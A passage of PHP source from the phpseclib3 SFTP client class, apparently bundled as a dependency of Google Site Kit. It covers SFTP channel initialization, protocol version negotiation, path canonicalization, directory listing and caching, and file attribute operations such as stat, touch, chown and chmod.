'NET_SFTP_OPEN_CREATE', 0x10 => 'NET_SFTP_OPEN_TRUNCATE', 0x20 => 'NET_SFTP_OPEN_EXCL', 0x40 => 'NET_SFTP_OPEN_TEXT']; // SFTPv5+ changed the flags up: // https://datatracker.ietf.org/doc/html/draft-ietf-secsh-filexfer-13#section-8.1.1.3 self::$open_flags5 = [ // when SSH_FXF_ACCESS_DISPOSITION is a 3 bit field that controls how the file is opened 0x0 => 'NET_SFTP_OPEN_CREATE_NEW', 0x1 => 'NET_SFTP_OPEN_CREATE_TRUNCATE', 0x2 => 'NET_SFTP_OPEN_OPEN_EXISTING', 0x3 => 'NET_SFTP_OPEN_OPEN_OR_CREATE', 0x4 => 'NET_SFTP_OPEN_TRUNCATE_EXISTING', // the rest of the flags are not supported 0x8 => 'NET_SFTP_OPEN_APPEND_DATA', // "the offset field of SS_FXP_WRITE requests is ignored" 0x10 => 'NET_SFTP_OPEN_APPEND_DATA_ATOMIC', 0x20 => 'NET_SFTP_OPEN_TEXT_MODE', 0x40 => 'NET_SFTP_OPEN_BLOCK_READ', 0x80 => 'NET_SFTP_OPEN_BLOCK_WRITE', 0x100 => 'NET_SFTP_OPEN_BLOCK_DELETE', 0x200 => 'NET_SFTP_OPEN_BLOCK_ADVISORY', 0x400 => 'NET_SFTP_OPEN_NOFOLLOW', 0x800 => 'NET_SFTP_OPEN_DELETE_ON_CLOSE', 0x1000 => 'NET_SFTP_OPEN_ACCESS_AUDIT_ALARM_INFO', 0x2000 => 'NET_SFTP_OPEN_ACCESS_BACKUP', 0x4000 => 'NET_SFTP_OPEN_BACKUP_STREAM', 0x8000 => 'NET_SFTP_OPEN_OVERRIDE_OWNER', ]; // http://tools.ietf.org/html/draft-ietf-secsh-filexfer-04#section-5.2 // see \phpseclib3\Net\SFTP::_parseLongname() for an explanation self::$file_types = [ 1 => 'NET_SFTP_TYPE_REGULAR', 2 => 'NET_SFTP_TYPE_DIRECTORY', 3 => 'NET_SFTP_TYPE_SYMLINK', 4 => 'NET_SFTP_TYPE_SPECIAL', 5 => 'NET_SFTP_TYPE_UNKNOWN', // the following types were first defined for use in SFTPv5+ // http://tools.ietf.org/html/draft-ietf-secsh-filexfer-05#section-5.2 6 => 'NET_SFTP_TYPE_SOCKET', 7 => 'NET_SFTP_TYPE_CHAR_DEVICE', 8 => 'NET_SFTP_TYPE_BLOCK_DEVICE', 9 => 'NET_SFTP_TYPE_FIFO', ]; self::define_array(self::$packet_types, self::$status_codes, self::$attributes, self::$open_flags, self::$open_flags5, self::$file_types); } if (!\defined('Google\\Site_Kit_Dependencies\\NET_SFTP_QUEUE_SIZE')) { \define('Google\\Site_Kit_Dependencies\\NET_SFTP_QUEUE_SIZE', 32); } if (!\defined('Google\\Site_Kit_Dependencies\\NET_SFTP_UPLOAD_QUEUE_SIZE')) { \define('Google\\Site_Kit_Dependencies\\NET_SFTP_UPLOAD_QUEUE_SIZE', 1024); } } /** * Check a few things before SFTP functions are called * * @return bool */ private function precheck() { if (!($this->bitmap & \Google\Site_Kit_Dependencies\phpseclib3\Net\SSH2::MASK_LOGIN)) { return \false; } if ($this->pwd === \false) { return $this->init_sftp_connection(); } return \true; } /** * Partially initialize an SFTP connection * * @throws \UnexpectedValueException on receipt of unexpected packets * @return bool */ private function partial_init_sftp_connection() { $response = $this->open_channel(self::CHANNEL, \true); if ($response === \true && $this->isTimeout()) { return \false; } $packet = \Google\Site_Kit_Dependencies\phpseclib3\Common\Functions\Strings::packSSH2('CNsbs', NET_SSH2_MSG_CHANNEL_REQUEST, $this->server_channels[self::CHANNEL], 'subsystem', \true, 'sftp'); $this->send_binary_packet($packet); $this->channel_status[self::CHANNEL] = NET_SSH2_MSG_CHANNEL_REQUEST; $response = $this->get_channel_packet(self::CHANNEL, \true); if ($response === \false) { // from PuTTY's psftp.exe $command = "test -x /usr/lib/sftp-server && exec /usr/lib/sftp-server\n" . "test -x /usr/local/lib/sftp-server && exec /usr/local/lib/sftp-server\n" . "exec sftp-server"; // we don't do $this->exec($command, false) because exec() operates on a different channel and plus the SSH_MSG_CHANNEL_OPEN that exec() does // is redundant $packet = \Google\Site_Kit_Dependencies\phpseclib3\Common\Functions\Strings::packSSH2('CNsCs', NET_SSH2_MSG_CHANNEL_REQUEST, $this->server_channels[self::CHANNEL], 'exec', 1, $command); $this->send_binary_packet($packet); $this->channel_status[self::CHANNEL] = NET_SSH2_MSG_CHANNEL_REQUEST; $response = $this->get_channel_packet(self::CHANNEL, \true); if ($response === \false) { return \false; } } elseif ($response === \true && $this->isTimeout()) { return \false; } $this->channel_status[self::CHANNEL] = NET_SSH2_MSG_CHANNEL_DATA; $this->send_sftp_packet(NET_SFTP_INIT, "\x00\x00\x00\x03"); $response = $this->get_sftp_packet(); if ($this->packet_type != NET_SFTP_VERSION) { throw new \UnexpectedValueException('Expected NET_SFTP_VERSION. ' . 'Got packet type: ' . $this->packet_type); } $this->use_request_id = \true; list($this->defaultVersion) = \Google\Site_Kit_Dependencies\phpseclib3\Common\Functions\Strings::unpackSSH2('N', $response); while (!empty($response)) { list($key, $value) = \Google\Site_Kit_Dependencies\phpseclib3\Common\Functions\Strings::unpackSSH2('ss', $response); $this->extensions[$key] = $value; } $this->partial_init = \true; return \true; } /** * (Re)initializes the SFTP channel * * @return bool */ private function init_sftp_connection() { if (!$this->partial_init && !$this->partial_init_sftp_connection()) { return \false; } /* A Note on SFTPv4/5/6 support: <http://tools.ietf.org/html/draft-ietf-secsh-filexfer-13#section-5.1> states the following: "If the client wishes to interoperate with servers that support noncontiguous version numbers it SHOULD send '3'" Given that the server only sends its version number after the client has already done so, the above seems to be suggesting that v3 should be the default version. This makes sense given that v3 is the most popular. <http://tools.ietf.org/html/draft-ietf-secsh-filexfer-13#section-5.5> states the following; "If the server did not send the "versions" extension, or the version-from-list was not included, the server MAY send a status response describing the failure, but MUST then close the channel without processing any further requests." So what do you do if you have a client whose initial SSH_FXP_INIT packet says it implements v3 and a server whose initial SSH_FXP_VERSION reply says it implements v4 and only v4? If it only implements v4, the "versions" extension is likely not going to have been sent so version re-negotiation as discussed in draft-ietf-secsh-filexfer-13 would be quite impossible. As such, what \phpseclib3\Net\SFTP would do is close the channel and reopen it with a new and updated SSH_FXP_INIT packet. */ $this->version = $this->defaultVersion; if (isset($this->extensions['versions']) && (!$this->preferredVersion || $this->preferredVersion != $this->version)) { $versions = \explode(',', $this->extensions['versions']); $supported = [6, 5, 4]; if ($this->preferredVersion) { $supported = \array_diff($supported, [$this->preferredVersion]); \array_unshift($supported, $this->preferredVersion); } foreach ($supported as $ver) { if (\in_array($ver, $versions)) { if ($ver === $this->version) { break; } $this->version = (int) $ver; $packet = \Google\Site_Kit_Dependencies\phpseclib3\Common\Functions\Strings::packSSH2('ss', 'version-select', "{$ver}"); $this->send_sftp_packet(NET_SFTP_EXTENDED, $packet); $response = $this->get_sftp_packet(); if ($this->packet_type != NET_SFTP_STATUS) { throw new \UnexpectedValueException('Expected NET_SFTP_STATUS. ' . 'Got packet type: ' . $this->packet_type); } list($status) = \Google\Site_Kit_Dependencies\phpseclib3\Common\Functions\Strings::unpackSSH2('N', $response); if ($status != NET_SFTP_STATUS_OK) { $this->logError($response, $status); throw new \UnexpectedValueException('Expected NET_SFTP_STATUS_OK. ' . ' Got ' . $status); } break; } } } /* SFTPv4+ defines a 'newline' extension. SFTPv3 seems to have unofficial support for it via 'newline@vandyke.com', however, I'm not sure what 'newline@vandyke.com' is supposed to do (the fact that it's unofficial means that it's not in the official SFTPv3 specs) and 'newline@vandyke.com' / 'newline' are likely not drop-in substitutes for one another due to the fact that 'newline' comes with a SSH_FXF_TEXT bitmask whereas it seems unlikely that 'newline@vandyke.com' would. */ /* if (isset($this->extensions['newline@vandyke.com'])) { $this->extensions['newline'] = $this->extensions['newline@vandyke.com']; unset($this->extensions['newline@vandyke.com']); } */ if ($this->version < 2 || $this->version > 6) { return \false; } $this->pwd = \true; try { $this->pwd = $this->realpath('.'); } catch (\UnexpectedValueException $e) { if (!$this->canonicalize_paths) { throw $e; } $this->canonicalize_paths = \false; $this->reset_sftp(); return $this->init_sftp_connection(); } $this->update_stat_cache($this->pwd, []); return \true; } /** * Disable the stat cache * */ public function disableStatCache() { $this->use_stat_cache = \false; } /** * Enable the stat cache * */ public function enableStatCache() { $this->use_stat_cache = \true; } /** * Clear the stat cache * */ public function clearStatCache() { $this->stat_cache = []; } /** * Enable path canonicalization * */ public function enablePathCanonicalization() { $this->canonicalize_paths = \true; } /** * Disable path canonicalization * * If this is enabled then $sftp->pwd() will not return the canonicalized absolute path * */ public function disablePathCanonicalization() { $this->canonicalize_paths = \false; } /** * Enable arbitrary length packets * */ public function enableArbitraryLengthPackets() { $this->allow_arbitrary_length_packets = \true; } /** * Disable arbitrary length packets * */ public function disableArbitraryLengthPackets() { $this->allow_arbitrary_length_packets = \false; } /** * Returns the current directory name * * @return string|bool */ public function pwd() { if (!$this->precheck()) { return \false; } return $this->pwd; } /** * Logs errors * * @param string $response * @param int $status */ private function logError($response, $status = -1) { if ($status == -1) { list($status) = \Google\Site_Kit_Dependencies\phpseclib3\Common\Functions\Strings::unpackSSH2('N', $response); } $error = self::$status_codes[$status]; if ($this->version > 2) { list($message) = \Google\Site_Kit_Dependencies\phpseclib3\Common\Functions\Strings::unpackSSH2('s', $response); $this->sftp_errors[] = "{$error}: {$message}"; } else { $this->sftp_errors[] = $error; } } /** * Canonicalize the Server-Side Path Name * * SFTP doesn't provide a mechanism by which the current working directory can be changed, so we'll emulate it. Returns * the absolute (canonicalized) path. * * If canonicalize_paths has been disabled using disablePathCanonicalization(), $path is returned as-is. * * @see self::chdir() * @see self::disablePathCanonicalization() * @param string $path * @throws \UnexpectedValueException on receipt of unexpected packets * @return mixed */ public function realpath($path) { if ($this->precheck() === \false) { return \false; } if (!$this->canonicalize_paths) { if ($this->pwd === \true) { return '.'; } if (!\strlen($path) || $path[0] != '/') { $path = $this->pwd . '/' . $path; } $parts = \explode('/', $path); $afterPWD = $beforePWD = []; foreach ($parts as $part) { switch ($part) { //case '': // some SFTP servers /require/ double /'s. see https://github.com/phpseclib/phpseclib/pull/1137 case '.': break; case '..': if (!empty($afterPWD)) { \array_pop($afterPWD); } else { $beforePWD[] = '..'; } break; default: $afterPWD[] = $part; } } $beforePWD = \count($beforePWD) ? \implode('/', $beforePWD) : '.'; return $beforePWD . '/' . \implode('/', $afterPWD); } if ($this->pwd === \true) { // http://tools.ietf.org/html/draft-ietf-secsh-filexfer-13#section-8.9 $this->send_sftp_packet(NET_SFTP_REALPATH, \Google\Site_Kit_Dependencies\phpseclib3\Common\Functions\Strings::packSSH2('s', $path)); $response = $this->get_sftp_packet(); switch ($this->packet_type) { case NET_SFTP_NAME: // although SSH_FXP_NAME is implemented differently in SFTPv3 than it is in SFTPv4+, the following // should work on all SFTP versions since the only part of the SSH_FXP_NAME packet the following looks // at is the first part and that part is defined the same in SFTP versions 3 through 6. list(, $filename) = \Google\Site_Kit_Dependencies\phpseclib3\Common\Functions\Strings::unpackSSH2('Ns', $response); return $filename; case NET_SFTP_STATUS: $this->logError($response); return \false; default: throw new \UnexpectedValueException('Expected NET_SFTP_NAME or NET_SFTP_STATUS. ' . 'Got packet type: ' . $this->packet_type); } } if (!\strlen($path) || $path[0] != '/') { $path = $this->pwd . '/' . $path; } $path = \explode('/', $path); $new = []; foreach ($path as $dir) { if (!\strlen($dir)) { continue; } switch ($dir) { case '..': \array_pop($new); // fall-through case '.': break; default: $new[] = $dir; } } return '/' . \implode('/', $new); } /** * Changes the current directory * * @param string $dir * @throws \UnexpectedValueException on receipt of unexpected packets * @return bool */ public function chdir($dir) { if (!$this->precheck()) { return \false; } // assume current dir if $dir is empty if ($dir === '') { $dir = './'; // suffix a slash if needed } elseif ($dir[\strlen($dir) - 1] != '/') { $dir .= '/'; } $dir = $this->realpath($dir); // confirm that $dir is, in fact, a valid directory if ($this->use_stat_cache && \is_array($this->query_stat_cache($dir))) { $this->pwd = $dir; return \true; } // we could do a stat on the alleged $dir to see if it's a directory but that doesn't tell us // the currently logged in user has the appropriate permissions or not. maybe you could see if // the file's uid / gid match the currently logged in user's uid / gid but how there's no easy // way to get those with SFTP $this->send_sftp_packet(NET_SFTP_OPENDIR, \Google\Site_Kit_Dependencies\phpseclib3\Common\Functions\Strings::packSSH2('s', $dir)); // see \phpseclib3\Net\SFTP::nlist() for a more thorough explanation of the following $response = $this->get_sftp_packet(); switch ($this->packet_type) { case NET_SFTP_HANDLE: $handle = \substr($response, 4); break; case NET_SFTP_STATUS: $this->logError($response); return \false; default: throw new \UnexpectedValueException('Expected NET_SFTP_HANDLE or NET_SFTP_STATUS' . 'Got packet type: ' . $this->packet_type); } if (!$this->close_handle($handle)) { return \false; } $this->update_stat_cache($dir, []); $this->pwd = $dir; return \true; } /** * Returns a list of files in the given directory * * @param string $dir * @param bool $recursive * @return array|false */ public function nlist($dir = '.', $recursive = \false) { return $this->nlist_helper($dir, $recursive, ''); } /** * Helper method for nlist * * @param string $dir * @param bool $recursive * @param string $relativeDir * @return array|false */ private function nlist_helper($dir, $recursive, $relativeDir) { $files = $this->readlist($dir, \false); // If we get an int back, then that is an "unexpected" status. // We do not have a file list, so return false. if (\is_int($files)) { return \false; } if (!$recursive || $files === \false) { return $files; } $result = []; foreach ($files as $value) { if ($value == '.' || $value == '..') { $result[] = $relativeDir . $value; continue; } if (\is_array($this->query_stat_cache($this->realpath($dir . '/' . $value)))) { $temp = $this->nlist_helper($dir . '/' . $value, \true, $relativeDir . $value . '/'); $temp = \is_array($temp) ? $temp : []; $result = \array_merge($result, $temp); } else { $result[] = $relativeDir . $value; } } return $result; } /** * Returns a detailed list of files in the given directory * * @param string $dir * @param bool $recursive * @return array|false */ public function rawlist($dir = '.', $recursive = \false) { $files = $this->readlist($dir, \true); // If we get an int back, then that is an "unexpected" status. // We do not have a file list, so return false. if (\is_int($files)) { return \false; } if (!$recursive || $files === \false) { return $files; } static $depth = 0; foreach ($files as $key => $value) { if ($depth != 0 && $key == '..') { unset($files[$key]); continue; } $is_directory = \false; if ($key != '.' && $key != '..') { if ($this->use_stat_cache) { $is_directory = \is_array($this->query_stat_cache($this->realpath($dir . '/' . $key))); } else { $stat = $this->lstat($dir . '/' . $key); $is_directory = $stat && $stat['type'] === NET_SFTP_TYPE_DIRECTORY; } } if ($is_directory) { $depth++; $files[$key] = $this->rawlist($dir . '/' . $key, \true); $depth--; } else { $files[$key] = (object) $value; } } return $files; } /** * Reads a list, be it detailed or not, of files in the given directory * * @param string $dir * @param bool $raw * @return array|false * @throws \UnexpectedValueException on receipt of unexpected packets */ private function readlist($dir, $raw = \true) { if (!$this->precheck()) { return \false; } $dir = $this->realpath($dir . '/'); if ($dir === \false) { return \false; } // http://tools.ietf.org/html/draft-ietf-secsh-filexfer-13#section-8.1.2 $this->send_sftp_packet(NET_SFTP_OPENDIR, \Google\Site_Kit_Dependencies\phpseclib3\Common\Functions\Strings::packSSH2('s', $dir)); $response = $this->get_sftp_packet(); switch ($this->packet_type) { case NET_SFTP_HANDLE: // http://tools.ietf.org/html/draft-ietf-secsh-filexfer-13#section-9.2 // since 'handle' is the last field in the SSH_FXP_HANDLE packet, we'll just remove the first four bytes that // represent the length of the string and leave it at that $handle = \substr($response, 4); break; case NET_SFTP_STATUS: // presumably SSH_FX_NO_SUCH_FILE or SSH_FX_PERMISSION_DENIED list($status) = \Google\Site_Kit_Dependencies\phpseclib3\Common\Functions\Strings::unpackSSH2('N', $response); $this->logError($response, $status); return $status; default: throw new \UnexpectedValueException('Expected NET_SFTP_HANDLE or NET_SFTP_STATUS. ' . 'Got packet type: ' . $this->packet_type); } $this->update_stat_cache($dir, []); $contents = []; while (\true) { // http://tools.ietf.org/html/draft-ietf-secsh-filexfer-13#section-8.2.2 // why multiple SSH_FXP_READDIR packets would be sent when the response to a single one can span arbitrarily many // SSH_MSG_CHANNEL_DATA messages is not known to me. $this->send_sftp_packet(NET_SFTP_READDIR, \Google\Site_Kit_Dependencies\phpseclib3\Common\Functions\Strings::packSSH2('s', $handle)); $response = $this->get_sftp_packet(); switch ($this->packet_type) { case NET_SFTP_NAME: list($count) = \Google\Site_Kit_Dependencies\phpseclib3\Common\Functions\Strings::unpackSSH2('N', $response); for ($i = 0; $i < $count; $i++) { list($shortname) = \Google\Site_Kit_Dependencies\phpseclib3\Common\Functions\Strings::unpackSSH2('s', $response); // SFTPv4 "removed the long filename from the names structure-- it can now be // built from information available in the attrs structure." if ($this->version < 4) { list($longname) = \Google\Site_Kit_Dependencies\phpseclib3\Common\Functions\Strings::unpackSSH2('s', $response); } $attributes = $this->parseAttributes($response); if (!isset($attributes['type']) && $this->version < 4) { $fileType = $this->parseLongname($longname); if ($fileType) { $attributes['type'] = $fileType; } } $contents[$shortname] = $attributes + ['filename' => $shortname]; if (isset($attributes['type']) && $attributes['type'] == NET_SFTP_TYPE_DIRECTORY && ($shortname != '.' && $shortname != '..')) { $this->update_stat_cache($dir . '/' . $shortname, []); } else { if ($shortname == '..') { $temp = $this->realpath($dir . '/..') . '/.'; } else { $temp = $dir . '/' . $shortname; } $this->update_stat_cache($temp, (object) ['lstat' => $attributes]); } // SFTPv6 has an optional boolean end-of-list field, but we'll ignore that, since the // final SSH_FXP_STATUS packet should tell us that, already. } break; case NET_SFTP_STATUS: list($status) = \Google\Site_Kit_Dependencies\phpseclib3\Common\Functions\Strings::unpackSSH2('N', $response); if ($status != NET_SFTP_STATUS_EOF) { $this->logError($response, $status); return $status; } break 2; default: throw new \UnexpectedValueException('Expected NET_SFTP_NAME or NET_SFTP_STATUS. ' . 'Got packet type: ' . $this->packet_type); } } if (!$this->close_handle($handle)) { return \false; } if (\count($this->sortOptions)) { \uasort($contents, [&$this, 'comparator']); } return $raw ? $contents : \array_map('strval', \array_keys($contents)); } /** * Compares two rawlist entries using parameters set by setListOrder() * * Intended for use with uasort() * * @param array $a * @param array $b * @return int */ private function comparator(array $a, array $b) { switch (\true) { case $a['filename'] === '.' || $b['filename'] === '.': if ($a['filename'] === $b['filename']) { return 0; } return $a['filename'] === '.' ? -1 : 1; case $a['filename'] === '..' || $b['filename'] === '..': if ($a['filename'] === $b['filename']) { return 0; } return $a['filename'] === '..' ? -1 : 1; case isset($a['type']) && $a['type'] === NET_SFTP_TYPE_DIRECTORY: if (!isset($b['type'])) { return 1; } if ($b['type'] !== $a['type']) { return -1; } break; case isset($b['type']) && $b['type'] === NET_SFTP_TYPE_DIRECTORY: return 1; } foreach ($this->sortOptions as $sort => $order) { if (!isset($a[$sort]) || !isset($b[$sort])) { if (isset($a[$sort])) { return -1; } if (isset($b[$sort])) { return 1; } return 0; } switch ($sort) { case 'filename': $result = \strcasecmp($a['filename'], $b['filename']); if ($result) { return $order === \SORT_DESC ? -$result : $result; } break; case 'mode': $a[$sort] &= 07777; $b[$sort] &= 07777; // fall-through default: if ($a[$sort] === $b[$sort]) { break; } return $order === \SORT_ASC ? $a[$sort] - $b[$sort] : $b[$sort] - $a[$sort]; } } } /** * Defines how nlist() and rawlist() will be sorted - if at all. * * If sorting is enabled directories and files will be sorted independently with * directories appearing before files in the resultant array that is returned. * * Any parameter returned by stat is a valid sort parameter for this function. * Filename comparisons are case insensitive. * * Examples: * * $sftp->setListOrder('filename', SORT_ASC); * $sftp->setListOrder('size', SORT_DESC, 'filename', SORT_ASC); * $sftp->setListOrder(true); * Separates directories from files but doesn't do any sorting beyond that * $sftp->setListOrder(); * Don't do any sort of sorting * * @param string ...$args */ public function setListOrder(...$args) { $this->sortOptions = []; if (empty($args)) { return; } $len = \count($args) & 0x7ffffffe; for ($i = 0; $i < $len; $i += 2) { $this->sortOptions[$args[$i]] = $args[$i + 1]; } if (!\count($this->sortOptions)) { $this->sortOptions = ['bogus' => \true]; } } /** * Save files / directories to cache * * @param string $path * @param mixed $value */ private function update_stat_cache($path, $value) { if ($this->use_stat_cache === \false) { return; } // preg_replace('#^/|/(?=/)|/$#', '', $dir) == str_replace('//', '/', trim($path, '/')) $dirs = \explode('/', \preg_replace('#^/|/(?=/)|/$#', '', $path)); $temp =& $this->stat_cache; $max = \count($dirs) - 1; foreach ($dirs as $i => $dir) { // if $temp is an object that means one of two things. // 1. a file was deleted and changed to a directory behind phpseclib's back // 2. it's a symlink. when lstat is done it's unclear what it's a symlink to if (\is_object($temp)) { $temp = []; } if (!isset($temp[$dir])) { $temp[$dir] = []; } if ($i === $max) { if (\is_object($temp[$dir]) && \is_object($value)) { if (!isset($value->stat) && isset($temp[$dir]->stat)) { $value->stat = $temp[$dir]->stat; } if (!isset($value->lstat) && isset($temp[$dir]->lstat)) { $value->lstat = $temp[$dir]->lstat; } } $temp[$dir] = $value; break; } $temp =& $temp[$dir]; } } /** * Remove files / directories from cache * * @param string $path * @return bool */ private function remove_from_stat_cache($path) { $dirs = \explode('/', \preg_replace('#^/|/(?=/)|/$#', '', $path)); $temp =& $this->stat_cache; $max = \count($dirs) - 1; foreach ($dirs as $i => $dir) { if (!\is_array($temp)) { return \false; } if ($i === $max) { unset($temp[$dir]); return \true; } if (!isset($temp[$dir])) { return \false; } $temp =& $temp[$dir]; } } /** * Checks cache for path * * Mainly used by file_exists * * @param string $path * @return mixed */ private function query_stat_cache($path) { $dirs = \explode('/', \preg_replace('#^/|/(?=/)|/$#', '', $path)); $temp =& $this->stat_cache; foreach ($dirs as $dir) { if (!\is_array($temp)) { return null; } if (!isset($temp[$dir])) { return null; } $temp =& $temp[$dir]; } return $temp; } /** * Returns general information about a file. * * Returns an array on success and false otherwise. * * @param string $filename * @return array|false */ public function stat($filename) { if (!$this->precheck()) { return \false; } $filename = $this->realpath($filename); if ($filename === \false) { return \false; } if ($this->use_stat_cache) { $result = $this->query_stat_cache($filename); if (\is_array($result) && isset($result['.']) && isset($result['.']->stat)) { return $result['.']->stat; } if (\is_object($result) && isset($result->stat)) { return $result->stat; } } $stat = $this->stat_helper($filename, NET_SFTP_STAT); if ($stat === \false) { $this->remove_from_stat_cache($filename); return \false; } if (isset($stat['type'])) { if ($stat['type'] == NET_SFTP_TYPE_DIRECTORY) { $filename .= '/.'; } $this->update_stat_cache($filename, (object) ['stat' => $stat]); return $stat; } $pwd = $this->pwd; $stat['type'] = $this->chdir($filename) ? NET_SFTP_TYPE_DIRECTORY : NET_SFTP_TYPE_REGULAR; $this->pwd = $pwd; if ($stat['type'] == NET_SFTP_TYPE_DIRECTORY) { $filename .= '/.'; } $this->update_stat_cache($filename, (object) ['stat' => $stat]); return $stat; } /** * Returns general information about a file or symbolic link. * * Returns an array on success and false otherwise. * * @param string $filename * @return array|false */ public function lstat($filename) { if (!$this->precheck()) { return \false; } $filename = $this->realpath($filename); if ($filename === \false) { return \false; } if ($this->use_stat_cache) { $result = $this->query_stat_cache($filename); if (\is_array($result) && isset($result['.']) && isset($result['.']->lstat)) { return $result['.']->lstat; } if (\is_object($result) && isset($result->lstat)) { return $result->lstat; } } $lstat = $this->stat_helper($filename, NET_SFTP_LSTAT); if ($lstat === \false) { $this->remove_from_stat_cache($filename); return \false; } if (isset($lstat['type'])) { if ($lstat['type'] == NET_SFTP_TYPE_DIRECTORY) { $filename .= '/.'; } $this->update_stat_cache($filename, (object) ['lstat' => $lstat]); return $lstat; } $stat = $this->stat_helper($filename, NET_SFTP_STAT); if ($lstat != $stat) { $lstat = \array_merge($lstat, ['type' => NET_SFTP_TYPE_SYMLINK]); $this->update_stat_cache($filename, (object) ['lstat' => $lstat]); return $stat; } $pwd = $this->pwd; $lstat['type'] = $this->chdir($filename) ? NET_SFTP_TYPE_DIRECTORY : NET_SFTP_TYPE_REGULAR; $this->pwd = $pwd; if ($lstat['type'] == NET_SFTP_TYPE_DIRECTORY) { $filename .= '/.'; } $this->update_stat_cache($filename, (object) ['lstat' => $lstat]); return $lstat; } /** * Returns general information about a file or symbolic link * * Determines information without calling \phpseclib3\Net\SFTP::realpath(). * The second parameter can be either NET_SFTP_STAT or NET_SFTP_LSTAT. * * @param string $filename * @param int $type * @throws \UnexpectedValueException on receipt of unexpected packets * @return array|false */ private function stat_helper($filename, $type) { // SFTPv4+ adds an additional 32-bit integer field - flags - to the following: $packet = \Google\Site_Kit_Dependencies\phpseclib3\Common\Functions\Strings::packSSH2('s', $filename); $this->send_sftp_packet($type, $packet); $response = $this->get_sftp_packet(); switch ($this->packet_type) { case NET_SFTP_ATTRS: return $this->parseAttributes($response); case NET_SFTP_STATUS: $this->logError($response); return \false; } throw new \UnexpectedValueException('Expected NET_SFTP_ATTRS or NET_SFTP_STATUS. ' . 'Got packet type: ' . $this->packet_type); } /** * Truncates a file to a given length * * @param string $filename * @param int $new_size * @return bool */ public function truncate($filename, $new_size) { $attr = \Google\Site_Kit_Dependencies\phpseclib3\Common\Functions\Strings::packSSH2('NQ', NET_SFTP_ATTR_SIZE, $new_size); return $this->setstat($filename, $attr, \false); } /** * Sets access and modification time of file. * * If the file does not exist, it will be created. * * @param string $filename * @param int $time * @param int $atime * @throws \UnexpectedValueException on receipt of unexpected packets * @return bool */ public function touch($filename, $time = null, $atime = null) { if (!$this->precheck()) { return \false; } $filename = $this->realpath($filename); if ($filename === \false) { return \false; } if (!isset($time)) { $time = \time(); } if (!isset($atime)) { $atime = $time; } $attr = $this->version < 4 ? \pack('N3', NET_SFTP_ATTR_ACCESSTIME, $atime, $time) : \Google\Site_Kit_Dependencies\phpseclib3\Common\Functions\Strings::packSSH2('NQ2', NET_SFTP_ATTR_ACCESSTIME | NET_SFTP_ATTR_MODIFYTIME, $atime, $time); $packet = \Google\Site_Kit_Dependencies\phpseclib3\Common\Functions\Strings::packSSH2('s', $filename); $packet .= $this->version >= 5 ? \pack('N2', 0, NET_SFTP_OPEN_OPEN_EXISTING) : \pack('N', NET_SFTP_OPEN_WRITE | NET_SFTP_OPEN_CREATE | NET_SFTP_OPEN_EXCL); $packet .= $attr; $this->send_sftp_packet(NET_SFTP_OPEN, $packet); $response = $this->get_sftp_packet(); switch ($this->packet_type) { case NET_SFTP_HANDLE: return $this->close_handle(\substr($response, 4)); case NET_SFTP_STATUS: $this->logError($response); break; default: throw new \UnexpectedValueException('Expected NET_SFTP_HANDLE or NET_SFTP_STATUS. ' . 'Got packet type: ' . $this->packet_type); } return $this->setstat($filename, $attr, \false); } /** * Changes file or directory owner * * $uid should be an int for SFTPv3 and a string for SFTPv4+. Ideally the string * would be of the form "user@dns_domain" but it does not need to be. * `$sftp->getSupportedVersions()['version']` will return the specific version * that's being used. * * Returns true on success or false on error. * * @param string $filename * @param int|string $uid * @param bool $recursive * @return bool */ public function chown($filename, $uid, $recursive = \false) { /* quoting <https://datatracker.ietf.org/doc/html/draft-ietf-secsh-filexfer-13#section-7.5>, "To avoid a representation that is tied to a particular underlying implementation at the client or server, the use of UTF-8 strings has been chosen. The string should be of the form "user@dns_domain". This will allow for a client and server that do not use the same local representation the ability to translate to a common syntax that can be interpreted by both. In the case where there is no translation available to the client or server, the attribute value must be constructed without the "@"." phpseclib _could_ auto append the dns_domain to $uid BUT what if it shouldn't have one? phpseclib would have no way of knowing so rather than guess phpseclib will just use whatever value the user provided */ $attr = $this->version < 4 ? \pack('N3', NET_SFTP_ATTR_UIDGID, $uid, -1) : \Google\Site_Kit_Dependencies\phpseclib3\Common\Functions\Strings::packSSH2('Nss', NET_SFTP_ATTR_OWNERGROUP, $uid, ''); return $this->setstat($filename, $attr, $recursive); } /** * Changes file or directory group * * $gid should be an int for SFTPv3 and a string for SFTPv4+. Ideally the string * would be of the form "user@dns_domain" but it does not need to be. * `$sftp->getSupportedVersions()['version']` will return the specific version * that's being used. * * Returns true on success or false on error. * * @param string $filename * @param int|string $gid * @param bool $recursive * @return bool */ public function chgrp($filename, $gid, $recursive = \false) { $attr = $this->version < 4 ? \pack('N3', NET_SFTP_ATTR_UIDGID, -1, $gid) : \Google\Site_Kit_Dependencies\phpseclib3\Common\Functions\Strings::packSSH2('Nss', NET_SFTP_ATTR_OWNERGROUP, '', $gid); return $this->setstat($filename, $attr, $recursive); } /** * Set permissions on a file. * * Returns the new file permissions on success or false on error. * If $recursive is true than this just returns true or false. * * @param int $mode * @param string $filename * @param bool $recursive * @throws \UnexpectedValueException on receipt of unexpected packets * @return mixed */ public function chmod($mode, $filename, $recursive = \false) { if (\is_string($mode) && \is_int($filename)) { $temp = $mode; $mode = $filename; $filename = $temp; } $attr = \pack('N2', NET_SFTP_ATTR_PERMISSIONS, $mode & 07777); if (!$this->setstat($filename, $attr, $recursive)) { return \false; } if ($recursive) { return \true; } $filename = $this->realpath($filename); // rather than return what the permissions *should* be, we'll return what they actually are. this will also // tell us if the file actually exists. // incidentally, SFTPv4+ adds an additional 32-bit integer field - flags - to the following: $packet = \pack('Na*', \strlen($filename), $filename); $this->send_sftp_packet(NET_SFTP_STAT, $packet); $response = $this->get_sftp_packet(); switch ($this->packet_type) { case NET_SFTP_ATTRS: $attrs = $this->parseAttributes($response); return $attrs['mode']; case NET_SFTP_STATUS: $this->logError($response); return \false; } throw new \UnexpectedValueException('Expected NET_SFTP_ATTRS or NET_SFTP_STATUS. ' . 'Got packet type: ' . $this->packet_type); } /** * Sets information about a file * * @param string $filename * @param string $attr * @param bool $recursive * @throws \UnexpectedValueException on receipt of unexpected packets * @return bool */ private function setstat($filename, $attr, $recursive) { if (!$this->precheck()) { return \false; } $filename = $this->realpath($filename); if ($filename === \false) { return \false; } $this->remove_from_stat_cache($filename); if ($recursive) { $i = 0; $result = $this->setstat_recursive($filename, $attr, $i); $this->read_put_responses($i); return $result; } $packet = \Google\Site_Kit_Dependencies\phpseclib3\Common\Functions\Strings::packSSH2('s', $filename); $packet .= $this->version >= 4 ? \pack('a*Ca*', \substr($attr, 0, 4), 